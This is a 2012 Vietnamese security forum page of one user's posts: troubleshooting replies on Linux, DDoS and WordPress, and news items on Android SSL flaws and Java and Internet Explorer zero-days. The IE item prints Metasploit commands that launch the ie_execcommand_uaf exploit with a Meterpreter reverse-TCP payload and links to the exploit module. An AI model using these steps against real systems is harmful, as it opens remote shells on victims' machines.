banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: xnohat  XML
Profile for xnohat Messages posted by xnohat [ number of posts not being displayed on this page: 11 ]
 

sasser01052004 wrote:
Bị timeout chứ có sai đâu anh, pass được 4-5 cái maze là bị timeout

Tại em thấy "cafe" thực thi chậm hơn "trăn", với lại "trăn" dễ viết hơn "cafe"

 


Sai, chương trình thực thi chậm hơn mà không có giải pháp khắc phục mà đổ lỗi cho khả năng của ngôn ngữ lập trình là fail ngay từ trong tư duy lập trình. Không có tư duy lập trình đúng đắn, tìm cách đổ lỗi cho một thứ gì đó thay vì cố gắng giải quyết nó thì thất bại trước khi đến được điểm khởi đầu của hacking
Sau khi máy bị tắt theo kiểu ngắt nguồn điện thì sẽ không còn nguồn điện duy trì vận hành cho card mạng nữa nên nó đâu còn "thức" để mà nhận các magic packet mà thực hiện Wake on Lan cho máy tính
Đây: http://bit.ly/Rmabvt

quanta wrote:

mr.tee wrote:
có em ạ.
Thường ngày thì em tải về, mở bằng notepad++ để chỉnh rồi up lên bình thường, không thấy vấn đề gì smilie
Hôm đó ngồi máy của bạn, mở đại bằng wordpad rồi táng, sau đó upload lên.
 

Hì, nguyên nhân là đây chứ đâu.

Muốn thay đổi thông tin liên quan đến user thì có `usermod` rồi. Muốn đổi shell thì dùng `chsh`. Không nên mở trực tiếp `/etc/passwd` để chỉnh sửa.

Bạn đọc tạm cái này nhé: http://en.wikipedia.org/wiki/Newline
 


Tối nay vô mới thấy topic này

Lỗi này mình cũng gặp 1 lần, và tình trạng y chang như bồ mr.tee bị, lỗi do tải file /etc/passwd về một máy windows để chỉnh sửa và save lại, nguyên do là newline khác biệt giữa windows và *nix, windows dùng \r\n thay vì chỉ \n như trên *nix, cơ mà mình bị khác 1 chút do mình đã kĩ tính find & replace hết vụ newline do thói quen, mình bị dính lỗi khi save file với format UTF-8 with BOM ( dùng Notepad++ để chỉnh sửa ) smilie note ra cho anh em nào bị lỗi trên thì tham khảo biết mà sửa

Gió Lào wrote:
Em không hiểu phần các request GET và POST cố định đó anh !( cố định và không cố định là ntn ? ). Anh giúp giùm em smilie 

Cố định là các request đó không có chứa các biến có giá trị thay đổi liên tục có chức năng xác định tính đơn nhất của request đó
Làm khó bạn rồi windak smilie HVA có csrf cũng khó mà khai thác được vì có quá nhiều giới hạn khó vượt qua
Điểm yếu trong việc áp dụng giao thức bảo mật SSL trên Android

Phương thức thông dụng nhất để bảo vệ luồng dữ liệu truyền tải qua mạng trên nền tảng Android thường là SSL hay TLS ( Secure Sockets Layer và Transport Layer Security ). Hiện có hàng ngàn ứng dụng trên sàn giao dịch ứng dụng Google Play đang áp dụng phương thức này

Một nhóm các nhà nghiên cứu từ các trường đại học về kĩ nghệ khoa học hàng đầu của Hoa Kỳ đã có một nghiên cứu về việc các ứng dụng Android hiện nay chứa hàng loạt sai lầm đáng ngại trong cách ứng dụng SSL/TLS vào việc bảo mật dữ liệu truyền tải qua mạng, điều này dẫn tới khả năng xảy ra các cuộc tấn công kiểu Man-in-the-Middle -1- sẽ khiến các thông tin, dữ liệu nhạy cảm của người dùng như tài khoản giao dịch ngân hàng, thông tin cá nhân, tài liệu mật, bị đánh cắp khi người dùng sử dụng các ứng dụng Android tưởng chừng an toàn này

Nhóm nghiên cứu đã thử nghiệm trên 100 ứng dụng được lựa chọn từ Android market, và họ đã xác định được 41 ứng dụng trong số đó có khả năng bị tấn công đánh cắp thông tin ( tỷ lệ 41% ). Các nhà nghiên cứu đã tạo ra một công cụ tấn công thử nghiệm gọi là MalloDroid, được thiết kế chuyên biệt để khai thác các lỗi về ứng dụng sai cách SSL/TLS trong các ứng dụng android, giúp chỉ ra các ứng dụng này hiện đang khiến người dùng gặp nguy cơ bị đánh cắp dữ liệu mật như thế nào

Họ đã thành công trong việc thu thập các dữ liệu mật của người dùng các ứng dụng bị lỗi áp dụng sai SSL/TLS như Tài khoản ngân hàng, tài khoản các dịch vụ online như Facebook, Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, tài khoản truy cập các máy chủ quan trọng, các địa chỉ email chứa thông tin quan trọng…
Nghiên cứu cũng cho thấy việc hoàn toàn có thể chèn và kích hoạt mã độc từ xa vào các ứng dụng android bị lập trình sai dẫn tới áp dụng sai giao thức SSL/TLS. Các tác giả đã cung cấp rộng rãi nghiên cứu này với tên "Why Eve and Mallory Love Android: An Analysis of Android (In)Security".

Điều quan trọng cần phải nắm là: đây là vấn đề cực kỳ nghiêm trọng, các lập trình viên với trách nhiệm của mình phải tuân thủ đúng các chỉ dẫn khi áp dụng giao thức SSL/TLS để tránh tạo các lỗ hổng để hacker khai thác và đánh cắp thông tin mật của người dùng

Theo The Hacker News
xnohat – HVA News

Tham khảo:
http://thehackernews.com/2012/10/security-weakness-in-android-app-ssl.html

Giải thích thuật ngữ:
Phương thức tấn công Man-in-the-Middle: thường hay được viết tắt là MITM, là kiểu tấn công mà tin tặc tìm cách đứng chặn ngay giữa hai máy tính đang truyền tải dữ liệu để lấy cắp thông tin đang truyền tải. Cách vốn hữu hiệu nhất để ngăn MITM là áp dụng SSL đúng cách, lúc này tin tặc có đánh cắp được tất cả các gói tin trung chuyển qua internet thì cũng không có cách gì giải mã được do nó đã bị mã hóa

Lời bàn của biên tập viên HVA News:
Các lỗi áp dụng sai giao thức SSL/TLS này thực sự không mới, bản thân nền tảng android cũng không yêu cầu nghiêm ngặt trong việc phải áp dụng SSL/TLS một cách đúng đắn, điều này làm Android tỏ ra thua kém khi so sánh với nền tảng iOS.
Đây là lúc cần cảnh báo người dùng, để an toàn, nên tránh sử dụng internet cho các công việc quan trọng như chuyển khoản ngân hàng tại các điểm truy cập internet công cộng. Sẽ an toàn hơn nếu bạn sử dụng kết nối Cellgular ví dụ như 4G LTE, 3G, EDGE, GPRS… thay vì kết nối vào các mạng wifi công cộng
Bồ không hiểu chỗ nào ?

Bmt_9x wrote:
Thân gửi các anh/chị trên diễn đàn HVAOnline.
Hiện tại mình đang quản lí một diễn đàn kinh doanh bình thường chuyên về vàng và chứng khoán. Thời gian 1 tháng trở lại đây diễn đàn bỗng nhiên bị chặt một cách bất ngờ từ phía VNPT, Viettel và FPT, chỉ có thể truy cập qua VPN hoặc proxy trung gian gây thiệt hại đáng kể cho việc phát triển diễn đàn.
Mình đã cố gắng liên hệ với tất cả các phía bên ISP nhưng bất thành. Bây giờ có lẽ chỉ còn cách đổi server và domain, nhưng đây có lẽ là hạ sách.
Thêm một chút thông tin về server của mình : Sử dụng VPS đặt tại Singapore (Godaddy), hiện chạy 2 website, một diễn đàn chính về kinh doanh và một diễn đàn nhỏ chạy cho nhóm, cả 2 tên miền đều không thể truy cập, kể cả vào trực tiếp IP.
Mình post lên đây mong tìm được phương án giải quyết cho trường hợp nan giải này, mong anh chị em có kinh nghiệm có thể giúp đỡ mình trong giai đoạn khó khăn này, xin chân thành cảm ơn 


Dạo gần đây tôi có nhận được vài report về việc Godaddy chặn dải IP đến từ VNPT và FPT. Chứ không phải các ISP này chặn IP của Godaddy. Tôi cũng có gửi mail trao đổi với dịch vụ khách hàng của Godaddy thì họ có xác nhận là họ có chặn IP từ 2 ISP ở một số cụm server thuộc Đông Nam Á của họ, lý do là vì họ bị tấn công từ chối dịch vụ với lưu lượng rất lớn đến từ các dải IP thuộc 2 ISP này. Sau vài cái mail và một cú điện thoại, thì họ đã ngưng chặn IP từ VNPT và FPT đối với dedicate server của tôi.

mrro wrote:
Tấn công CRIME là một tấn công với vào giao thức SSL/TLS mà anh Juliano Rizzo và tôi vừa trình bày ở hội thảo ekoparty 2012 cách đây vài ngày. Khi nào có thời gian tôi sẽ viết một bài mô tả chi tiết.

Xem slide ở đây: https://docs.google.com/presentation/d/11eBmGiHbYcHR9gL5nDyZChu_-lCa2GizeuOfaLU2HOU/edit#slide=id.g1e59c14c_1_54.

Nếu bạn nào có thắc mắc gì thì có thể đặt câu hỏi ở đây.

-m 


Chúc mừng lão smilie
Đã có mã khai thác thành công lỗi 0-day Internet Explorer, nguy cơ bị cài đặt malware từ xa (CVE 2012-4969 )

Microsoft có thông cáo xác nhận chính thức về lỗi 0-day (CVE 2012-4969) trong Internet Explorer. Hiện đã có 4 mã khai thác thành công lỗi này đang được truyền tay trên internet. Microsoft sẽ cung cấp khẩn cấp một bản vá tạm thời để sửa lỗi nghiêm trọng này.

Chuyên gia bảo mật Eric Romang đã xác định được mã khai thác lỗi Internet Explorer CVE 2012-4969 này được đặt tại một server của nhóm hacker “Nitro” – nhóm vốn được cho rằng là tác giả của mã khai thác nhằm vào lỗi 0-day của Java vào tháng trước. Công ty bảo mật Rapid7 khuyến cáo người dùng nên chuyển qua sử dụng trình duyệt khác thay thế IE.

Lỗi 0-day trong IE lần này là lỗi “use-after-free memory corruption” một dạng lỗi tương tự với dạng lỗi “buffer overflow”, lỗi này khiến cho máy tính cài đặt phiên bản IE bị lỗi dễ dàng bị hacker cài đặt các malware, virus, trojan từ xa. Mã khai thác đầu tiên được tìm thấy trong trojan PoisonIvy, một mã khai thác khác được tìm thấy trong trojan PlugX, cả 2 trojan này đều được ngụy trang dưới dạng một tập tin Flash Movie ( .swf ) bị thỏa hiệp.

Kiểu tấn công này thường bắt đầu bằng việc nạn nhân nhận được một email giả mạo hoặc một lời mời click vào một đường link không an toàn. Các chuyên gia an ninh mạng khuyến cáo rằng các trang web lớn hiện có đặt các quảng cáo trên website của họ có thể trở thành mồi ngon cho hacker, nếu như các máy chủ đặt các quảng cáo ( vốn độc lập với máy chủ chứa website ) bị hack. Qua đó hacker có thể dùng các website lớn để thực hiện việc tấn công diện rộng đối với những người dùng truy cập các website lớn đó

Trong một diễn biến khác, chính phủ Đức đã khuyến cáo các công dân Đức rằng họ nên thay Internet Explorer bằng một trình duyệt khác như Firefox, Chrome, Opera… . Microsoft thì khuyến cáo người dùng nên tắt chức năng ActiveX controls trên IE hoặc sử dụng Enhanced Mitigation Experience Toolkit cho đến khi họ cung cấp bản vá cho lỗi này

Công cụ khai thác lỗi huyền thoại Metasploit cũng đã cập nhật mã khai thác này với một thông báo: “Module khai thác mới này chứa mã khai thác nhắm vào lỗi 0-day mới của Microsoft Internet Explorer. Khi IE render một trang HTML, đối tượng CMshtmlEd đã bị xóa bỏ trong quá trình render, nhưng vùng nhớ của đối tượng này lại bị sử dụng lại một lần nữa bởi hàm CMshtmlEd::Exec(), điều này dẫn tới lỗi use-after-free ( gọi vùng nhớ sau khi vùng nhớ đã được làm trống ). Vui lòng ghi nhận rằng lỗi này đã được khai thác từ ngày 14 tháng 09 năm 2012 và cho đến hiện giờ vẫn chưa có bản vá cho lỗi này” .

Tải về module khai thác này tại đây http://pastebin.com/nyYxKfUJ

Cách sử dụng:
Code:
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid


(theo TheHackerNews)

xnohat - HVA News

Tham khảo:
http://thehackernews.com/2012/09/exploit-released-for-internet-explorer.html

TND.VN wrote:
Con WebServer đặt ở CTY mình bị ddos thế này. Router thì lúc nào cũng 50 -80 % trong khi đó cpu của server chỉ có 0-1%. Bình thường các trận DDoS kiểu http flooder thì cpu máy chủ 100% router k hề hấn gì(cái này thì khắc phục đc).

K hiểu có phải bị chơi DrDoS ko ? mình up 1 đoạn wireshark lên cho mọi người cùng ngâm cứu nhé smilie

http://www.mediafire.com/?9ty39dl2bn7h4m0 


Sniff các gói tin trên router ( nếu có thể ) để xem các gói tin chạm vào router và bị chặn lại là dạng gói tin gì. Nhiều khả năng ( theo dự đoán của tôi ) bồ đang bị flood bởi các gói DNS reply bởi kĩ thuật flood dùng DNS Amplify

xsecure wrote:
Chào các Bác! Tôi đang làm hồ sơ 1 dự án mà yêu cầu Cáp trục backbone 10Gbps. nhờ các Bác tư vấn sử dụng thiết bị của hãng nào đạt được các tiêu chí như : rẻ, có nhà phân phối ở VN, support tốt, đạt tốc độ 10Gbps cho uplink và 1Gbps cho port đồng.
rất mong nhận được sự giúp đỡ từ các Bác.
chân thành cảm ơn các Bác. 


Tôi thực sự không rõ bồ đang hỏi về điều gì ?

Bồ cần thông tin về nhà cung cấp đường truyền với bandwidth downlink 10Gbps hay một thiết bị định tuyến router hoạt động ở giới hạn kỹ thuật 10Gbps ?

leeanhtuan wrote:
Mình cứ nghĩ mã nguồn wordpress bảo mật tương đối nên không quan tâm đến CHMOD và một số Plugin bảo vệ cho nó ai ngờ hôm nọ bị 1 thằng gà nó hack rồi đem share hết mã nguồn và data của web mình. Bây giờ không biết nó hack kiểu gì và cách phòng chống, vậy lên đây tham khảo mọi người cách khắc phục. Có thể nào hack qua theme được không vì mình dùng theme được share của chính cái bọn đã hack blog của mình. Các plugin thì mình toàn lên trực tiếp wordpress.org tải. Ai dùng wordpress thì giúp mình với!!! smilie smilie smilie smilie  


Đoạn bôi đỏ đã trả lời câu hỏi của bồ

sieuquay4444 wrote:
không biết cai laptop bi lỗi gì mà không chạy hệ điều hành mình bỏ DVD vào cài lại thì máy chạy windpws ó loading file-> lên biểu tượng win rùi sau đó máy chuyển sang màu đen đứng lun có ai biết giúp mình với 


Đầu đọc DVD lâu không xài đọc đĩa kém, DVD ghi chất lượng kém đều gây ra nguyên do trên. Hoặc ngoài ra còn nguyên do từ việc bồ bật AHCI trong BIOS trong khi đĩa cài đặt không có sẵn Driver AHCI

Giải pháp:
- Cài từ USB
- Vô BIOS tắt AHCI
Bồ cần cung cấp thêm thông tin. Một đoạn log ngắn ngủn như trên không thể hiện được điều gì.
- Bồ cần cung cấp Access log, Error log, Firewall log, Snort log... các loại log có thể cung cấp để giúp tạo nên một cái nhìn tổng quan về tình trạng máy chủ của bồ khi bị DDoS
- Một gói Sniff các gói tin tới máy chủ của bồ vào thời gian bị DDoS ( có thể cung cấp riêng vì có thể chứa thông tin nhạy cảm )
- Các cấu hình của các dịch vụ có tiếp diện với internet như HTTP Web service, và các dịch vụ vụ trợ như Snort, iptables...
- Tình trạng load của máy chủ vào thời điểm bị DDoS ( top, ps aux ... )

Điều tiên quyết cần hiểu là bồ chỉ có thể giảm thiểu thiệt hại và duy trì hoạt động trong khi bị DDoS chứ không có cách loại bỏ DDoS/DoS hoàn toàn.
Bồ không thể làm bất kỳ điều gì để đỡ DDoS hiệu quả khi bồ dùng share hosting vì bồ không có quyền làm gì cả đối với cái server.
Thêm nữa là đỡ DDoS thường phải tốn thêm khá nhiều chi phí cho việc mở rộng băng thông hoặc bổ sung server
Cuối cùng là việc đỡ DDoS cần người có trình độ config server hoặc chí ít hiểu biết cách làm việc và cấu hình quản trị server ( thường là *nix ). Do đó, nếu bồ không phải là người thạo việc trên thì nên nhờ người có trình độ như trên làm giúp hoặc lên đây trao đổi giúp bồ, chứ không thì mọi reply trả lời/tư vấn trên đây là vô nghĩa vì bồ không thể làm theo.

Trân trọng,
hiện tượng này thường xảy ra sau khi hệ thống bị ngắt đột ngột khi đang ghi khối dữ liệu lớn làm hư hỏng hệ thống tập tin bồ cần chạy các công cụ check disk để fix các lỗi filesystem này
Đã có mã khai thác tự động thuộc Metasploit cho bug 0-day này

https://rstcenter.com/forum/57962-java-7-applet-remote-code-execution.rst
Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime Environments - Nguy cơ tấn công diện rộng vào người dùng cuối

Ngày 26/08/2012, Trong khi phân tích một mẫu malware có xuất xứ từ Trung Quốc các chuyên gia tại viện nghiên cứu bảo mật FireEye đã phát hiện một lỗi bảo mật 0-day cực kỳ nghiêm trọng trong Java Runtime Environment ( JRE ) ở hầu hết các phiên bản. Các chuyên gia xác nhận rằng đã khai thác thành công lỗi này trên Firefox bản mới nhất với JRE 1.7 update 6 ( phiên bản JRE mới nhất hiện nay ). Họ đã thành công trong việc cài đặt và kích chạy một virus (malware) trên máy tính thử nghiệm thông qua việc cho máy tính này truy cập một trang web trông có vẻ vô hại nhưng chứa mã khai thác.
Vấn đề trở nên nghiêm trọng hơn khi mã khai thác minh họa ( Proof-of-Concept ) đã được cung cấp rộng rãi trên internet cũng như sắp được cập nhật vào công cụ khai thác tự động nổi tiếng Metasploit. Các chuyên gia cảnh báo là có thể sẽ có một đợt tấn công diện rộng xảy ra do Oracle hiện vẫn chưa có kế hoạch cập nhật bản vá lỗi này.

Ý kiến của HVA: Đây là lỗi đặc biệt nghiêm trọng có thể sử dụng để cài đặt các loại malware như virus, trojan, keylogger… lên máy của nạn nhân thông qua một website trông có vẻ bình thường. Giả sử trong một trường hợp đáng ngại là các tin tặc thậm nhập được vào các website lớn như các trang tin, cổng thông tin, web-game… thì con số máy tính bị cài đặt mã độc sẽ lên đến hàng trăm thậm chí hàng ngàn vì chỉ cần người dung truy cập các trang web này với plugin Java Runtime cài đặt sẵn trong máy ( hầu hết máy tính đều có ) thì sẽ bị tin tặc âm thầm cài đặt mã độc lên máy.

Cách phòng chống: Vì hiện chưa có bản vá nên đề nghị người dùng nên tắt plugin Java Runtime Environments trong Firefox, chrome hoặc tạm thời gỡ bỏ JRE khỏi máy tính cho đến khi Oracle cung cấp bản vá cho lỗi này

xnohat – HVA News

Tham khảo:
http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
http://pastie.org/4594319

Chú giải:
Lỗi 0-day: là các lỗi bảo mật được các tin tặc âm thầm phát hiện, đã có mã khai thác thành công, nhưng không công bố và nhà sản xuất chưa có bản vá kịp thời
 
Go to Page:  First Page Page 2 4 5 6 Page 7 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|